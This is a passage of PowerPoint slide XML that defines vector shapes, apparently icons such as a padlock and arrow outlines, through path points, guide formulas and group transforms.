                  <a:pt x="346" y="62"/>
                  <a:pt x="310" y="70"/>
                  <a:pt x="275" y="79"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="283" y="88"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="283" y="97"/>
                  <a:pt x="275" y="97"/>
                  <a:pt x="275" y="106"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="310" y="141"/>
                  <a:pt x="328" y="186"/>
                  <a:pt x="346" y="239"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="363" y="239"/>
                  <a:pt x="381" y="248"/>
                  <a:pt x="390" y="266"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="417" y="266"/>
                  <a:pt x="434" y="266"/>
                  <a:pt x="452" y="257"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="248"/>
                  <a:pt x="461" y="230"/>
                  <a:pt x="461" y="221"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="461" y="160"/>
                  <a:pt x="426" y="97"/>
                  <a:pt x="381" y="53"/>
                </a:cubicBezTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="319" y="327"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="319" y="327"/>
                </a:lnTo>
                <a:cubicBezTo>
                  <a:pt x="257" y="354"/>
                  <a:pt x="213" y="389"/>
                  <a:pt x="177" y="443"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="195" y="451"/>
                  <a:pt x="213" y="451"/>
                  <a:pt x="230" y="451"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="266" y="451"/>
                  <a:pt x="292" y="443"/>
                  <a:pt x="328" y="434"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="407"/>
                  <a:pt x="337" y="380"/>
                  <a:pt x="337" y="363"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="337" y="354"/>
                  <a:pt x="337" y="345"/>
                  <a:pt x="328" y="336"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="328" y="327"/>
                  <a:pt x="319" y="327"/>
                  <a:pt x="319" y="3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lIns="34290" tIns="17145" rIns="34290" bIns="17145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/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="109" name="Freeform 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{854E4B31-FC87-4904-AF59-18E894A73CE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8923113" y="4301357"/>
            <a:ext cx="275459" cy="336378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="T0" fmla="*/ 226881 w 144"/>
              <a:gd name="T1" fmla="*/ 129977 h 256"/>
              <a:gd name="T2" fmla="*/ 226881 w 144"/>
              <a:gd name="T3" fmla="*/ 129977 h 256"/>
              <a:gd name="T4" fmla="*/ 150714 w 144"/>
              <a:gd name="T5" fmla="*/ 207963 h 256"/>
              <a:gd name="T6" fmla="*/ 226881 w 144"/>
              <a:gd name="T7" fmla="*/ 285948 h 256"/>
              <a:gd name="T8" fmla="*/ 233363 w 144"/>
              <a:gd name="T9" fmla="*/ 298946 h 256"/>
              <a:gd name="T10" fmla="*/ 226881 w 144"/>
              <a:gd name="T11" fmla="*/ 311944 h 256"/>
              <a:gd name="T12" fmla="*/ 129646 w 144"/>
              <a:gd name="T13" fmla="*/ 409426 h 256"/>
              <a:gd name="T14" fmla="*/ 116682 w 144"/>
              <a:gd name="T15" fmla="*/ 415925 h 256"/>
              <a:gd name="T16" fmla="*/ 97235 w 144"/>
              <a:gd name="T17" fmla="*/ 396429 h 256"/>
              <a:gd name="T18" fmla="*/ 97235 w 144"/>
              <a:gd name="T19" fmla="*/ 261578 h 256"/>
              <a:gd name="T20" fmla="*/ 32412 w 144"/>
              <a:gd name="T21" fmla="*/ 324941 h 256"/>
              <a:gd name="T22" fmla="*/ 19447 w 144"/>
              <a:gd name="T23" fmla="*/ 331440 h 256"/>
              <a:gd name="T24" fmla="*/ 0 w 144"/>
              <a:gd name="T25" fmla="*/ 311944 h 256"/>
              <a:gd name="T26" fmla="*/ 6482 w 144"/>
              <a:gd name="T27" fmla="*/ 298946 h 256"/>
              <a:gd name="T28" fmla="*/ 95614 w 144"/>
              <a:gd name="T29" fmla="*/ 207963 h 256"/>
              <a:gd name="T30" fmla="*/ 6482 w 144"/>
              <a:gd name="T31" fmla="*/ 116979 h 256"/>
              <a:gd name="T32" fmla="*/ 0 w 144"/>
              <a:gd name="T33" fmla="*/ 103981 h 256"/>
              <a:gd name="T34" fmla="*/ 19447 w 144"/>
              <a:gd name="T35" fmla="*/ 84485 h 256"/>
              <a:gd name="T36" fmla="*/ 32412 w 144"/>
              <a:gd name="T37" fmla="*/ 90984 h 256"/>
              <a:gd name="T38" fmla="*/ 97235 w 144"/>
              <a:gd name="T39" fmla="*/ 154347 h 256"/>
              <a:gd name="T40" fmla="*/ 97235 w 144"/>
              <a:gd name="T41" fmla="*/ 19496 h 256"/>
              <a:gd name="T42" fmla="*/ 116682 w 144"/>
              <a:gd name="T43" fmla="*/ 0 h 256"/>
              <a:gd name="T44" fmla="*/ 129646 w 144"/>
              <a:gd name="T45" fmla="*/ 6499 h 256"/>
              <a:gd name="T46" fmla="*/ 226881 w 144"/>
              <a:gd name="T47" fmla="*/ 103981 h 256"/>
              <a:gd name="T48" fmla="*/ 233363 w 144"/>
              <a:gd name="T49" fmla="*/ 116979 h 256"/>
              <a:gd name="T50" fmla="*/ 226881 w 144"/>
              <a:gd name="T51" fmla="*/ 129977 h 256"/>
              <a:gd name="T52" fmla="*/ 136128 w 144"/>
              <a:gd name="T53" fmla="*/ 349312 h 256"/>
              <a:gd name="T54" fmla="*/ 186366 w 144"/>
              <a:gd name="T55" fmla="*/ 298946 h 256"/>
              <a:gd name="T56" fmla="*/ 136128 w 144"/>
              <a:gd name="T57" fmla="*/ 248580 h 256"/>
              <a:gd name="T58" fmla="*/ 136128 w 144"/>
              <a:gd name="T59" fmla="*/ 349312 h 256"/>
              <a:gd name="T60" fmla="*/ 136128 w 144"/>
              <a:gd name="T61" fmla="*/ 66613 h 256"/>
              <a:gd name="T62" fmla="*/ 136128 w 144"/>
              <a:gd name="T63" fmla="*/ 167345 h 256"/>
              <a:gd name="T64" fmla="*/ 186366 w 144"/>
              <a:gd name="T65" fmla="*/ 116979 h 256"/>
              <a:gd name="T66" fmla="*/ 136128 w 144"/>
              <a:gd name="T67" fmla="*/ 66613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44" h="256">
                <a:moveTo>
                  <a:pt x="140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3" y="178"/>
                  <a:pt x="144" y="181"/>
                  <a:pt x="144" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="187"/>
                  <a:pt x="143" y="190"/>
                  <a:pt x="140" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                  <a:pt x="80" y="252"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="78" y="255"/>
                  <a:pt x="75" y="256"/>
                  <a:pt x="72" y="256"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="65" y="256"/>
                  <a:pt x="60" y="251"/>
                  <a:pt x="60" y="244"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161"/>
                  <a:pt x="60" y="161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18" y="203"/>
                  <a:pt x="15" y="204"/>
                  <a:pt x="12" y="204"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="5" y="204"/>
                  <a:pt x="0" y="199"/>
                  <a:pt x="0" y="192"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="189"/>
                  <a:pt x="1" y="186"/>
                  <a:pt x="4" y="184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0"/>
                  <a:pt x="0" y="67"/>
                  <a:pt x="0" y="64"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="57"/>
                  <a:pt x="5" y="52"/>
                  <a:pt x="12" y="52"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="15" y="52"/>
                  <a:pt x="18" y="53"/>
                  <a:pt x="20" y="56"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95"/>
                  <a:pt x="60" y="95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75" y="0"/>
                  <a:pt x="78" y="1"/>
                  <a:pt x="80" y="4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3" y="66"/>
                  <a:pt x="144" y="69"/>
                  <a:pt x="144" y="72"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="144" y="75"/>
                  <a:pt x="143" y="78"/>
                  <a:pt x="140" y="80"/>
                </a:cubicBezTo>
                <a:moveTo>
                  <a:pt x="84" y="215"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                  <a:pt x="115" y="184"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                  <a:pt x="84" y="153"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="215"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="84" y="41"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                  <a:pt x="84" y="103"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                  <a:pt x="115" y="72"/>
                </a:cubicBezTo>
                <a:lnTo>
                  <a:pt x="84" y="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10" name="Freeform 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EA559715-1923-43C9-B40A-C2309DA2909E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noEditPoints="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="8029450" y="2603366"/>
            <a:ext cx="303353" cy="353750"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst>
              <a:cxn ang="0">
                <a:pos x="180" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="167" y="34"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="133" y="7"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="0"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="62" y="14"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="35" y="47"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="132"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="17" y="136"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="156"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="0" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="8" y="295"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="303"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="286"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="207" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="205" y="150"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="185" y="134"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="51" y="54"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="71" y="29"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="20"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="125" y="24"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="151" y="45"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="160" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="47" y="76"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="187" y="279"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="180" y="285"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="24" y="283"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="276"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="18" y="158"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="27" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="183" y="152"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="189" y="161"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="113" y="190"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="111" y="183"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="179"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="187"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="95" y="212"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="223"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="85" y="236"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="104" y="246"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="241"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="122" y="228"/>
              </a:cxn>
              <a:cxn ang="0">
                <a:pos x="116" y="214"/>
              </a:cxn>
            </a:cxnLst>
            <a:rect l="0" t="0" r="r" b="b"/>
            <a:pathLst>
              <a:path w="207" h="303">
                <a:moveTo>
                  <a:pt x="180" y="132"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="178" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="172" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="167" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="145" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="133" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="89" y="2"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="75" y="7"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="62" y="14"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="49" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="40" y="34"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="35" y="47"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="29" y="62"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="8" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="303"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="301"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="295"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="286"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="207" y="156"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="205" y="150"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="200" y="141"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="191" y="136"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="134"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="132"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="47" y="76"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="51" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="56" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="71" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="82" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="93" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="114" y="20"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="125" y="24"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="134" y="29"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="143" y="36"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151" y="45"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="156" y="54"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="65"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="76"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="160" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="132"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="47" y="76"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="189" y="276"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="285"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="283"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="281"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="279"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="276"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="22" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="24" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="27" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="180" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="183" y="152"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185" y="154"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187" y="158"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="161"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="189" y="276"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="113" y="212"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="107" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="179"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="100" y="181"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="183"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="187"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="190"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="95" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="87" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="85" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="91" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="96" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="104" y="246"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="111" y="245"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="241"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="236"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="228"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="122" y="223"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="120" y="217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="116" y="214"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="212"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="113" y="21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2400"/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E4CE7046-64D6-48C1-B7B8-9D5763BA3105}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3496641" y="1600201"/>
            <a:ext cx="5198718" cy="4496838"/>
            <a:chOff x="3736336" y="2014895"/>
            <a:chExt cx="4719296" cy="4082143"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="112" name="Group 111"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="3736336" y="5001931"/>
              <a:ext cx="1013878" cy="499940"/>
              <a:chOff x="3736336" y="5001931"/>
              <a:chExt cx="1013878" cy="499940"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="160" name="Freeform 13"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3736336" y="5001931"/>
                <a:ext cx="1013878" cy="499940"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 724"/>
                  <a:gd name="T1" fmla="*/ 357 h 357"/>
                  <a:gd name="T2" fmla="*/ 507 w 724"/>
                  <a:gd name="T3" fmla="*/ 357 h 357"/>
                  <a:gd name="T4" fmla="*/ 724 w 724"/>
                  <a:gd name="T5" fmla="*/ 0 h 357"/>
                  <a:gd name="T6" fmla="*/ 260 w 724"/>
                  <a:gd name="T7" fmla="*/ 0 h 357"/>
                  <a:gd name="T8" fmla="*/ 0 w 724"/>
                  <a:gd name="T9" fmla="*/ 176 h 357"/>
                  <a:gd name="T10" fmla="*/ 260 w 724"/>
                  <a:gd name="T11" fmla="*/ 357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4" h="357">
                    <a:moveTo>
                      <a:pt x="260" y="357"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="507" y="357"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="724" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="176"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="260" y="357"/>
                    </a:ln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" name="Freeform 14"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="3789551" y="5031340"/>
                <a:ext cx="943859" cy="441124"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 674 w 674"/>
                  <a:gd name="T1" fmla="*/ 0 h 315"/>
                  <a:gd name="T2" fmla="*/ 230 w 674"/>
                  <a:gd name="T3" fmla="*/ 0 h 315"/>
                  <a:gd name="T4" fmla="*/ 0 w 674"/>
                  <a:gd name="T5" fmla="*/ 155 h 315"/>
                  <a:gd name="T6" fmla="*/ 230 w 674"/>
                  <a:gd name="T7" fmla="*/ 315 h 315"/>
                  <a:gd name="T8" fmla="*/ 481 w 674"/>
                  <a:gd name="T9" fmla="*/ 315 h 315"/>
                  <a:gd name="T10" fmla="*/ 674 w 674"/>
                  <a:gd name="T11" fmla="*/ 0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315">
                    <a:moveTo>
                      <a:pt x="674" y="0"/>
                    </a:moveTo>
                    <a:lnTo>
                      <a:pt x="230" y="0"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="0" y="155"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="230" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="481" y="315"/>
                    </a:lnTo>
                    <a:lnTo>
                      <a:pt x="67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13" name="Group 112"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="4433728" y="3567930"/>
              <a:ext cx="987271" cy="568559"/>
              <a:chOff x="4433728" y="3567930"/>
              <a:chExt cx="987271" cy="568559"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="156" name="Freeform 11"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr bwMode="auto">
              <a:xfrm>
                <a:off x="4433728" y="3567930"/>
                <a:ext cx="987271" cy="568559"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 260 w 705"/>
                  <a:gd name="T1" fmla="*/ 406 h 406"/>
                  <a:gd name="T2" fmla="*/ 488 w 705"/>
                  <a:gd name="T3" fmla="*/ 406 h 406"/>
                  <a:gd name="T4" fmla="*/ 705 w 705"/>
                  <a:gd name="T5" fmla="*/ 0 h 406"/>
                  <a:gd name="T6" fmla="*/ 260 w 705"/>
                  <a:gd name="T7" fmla="*/ 0 h 406"/>
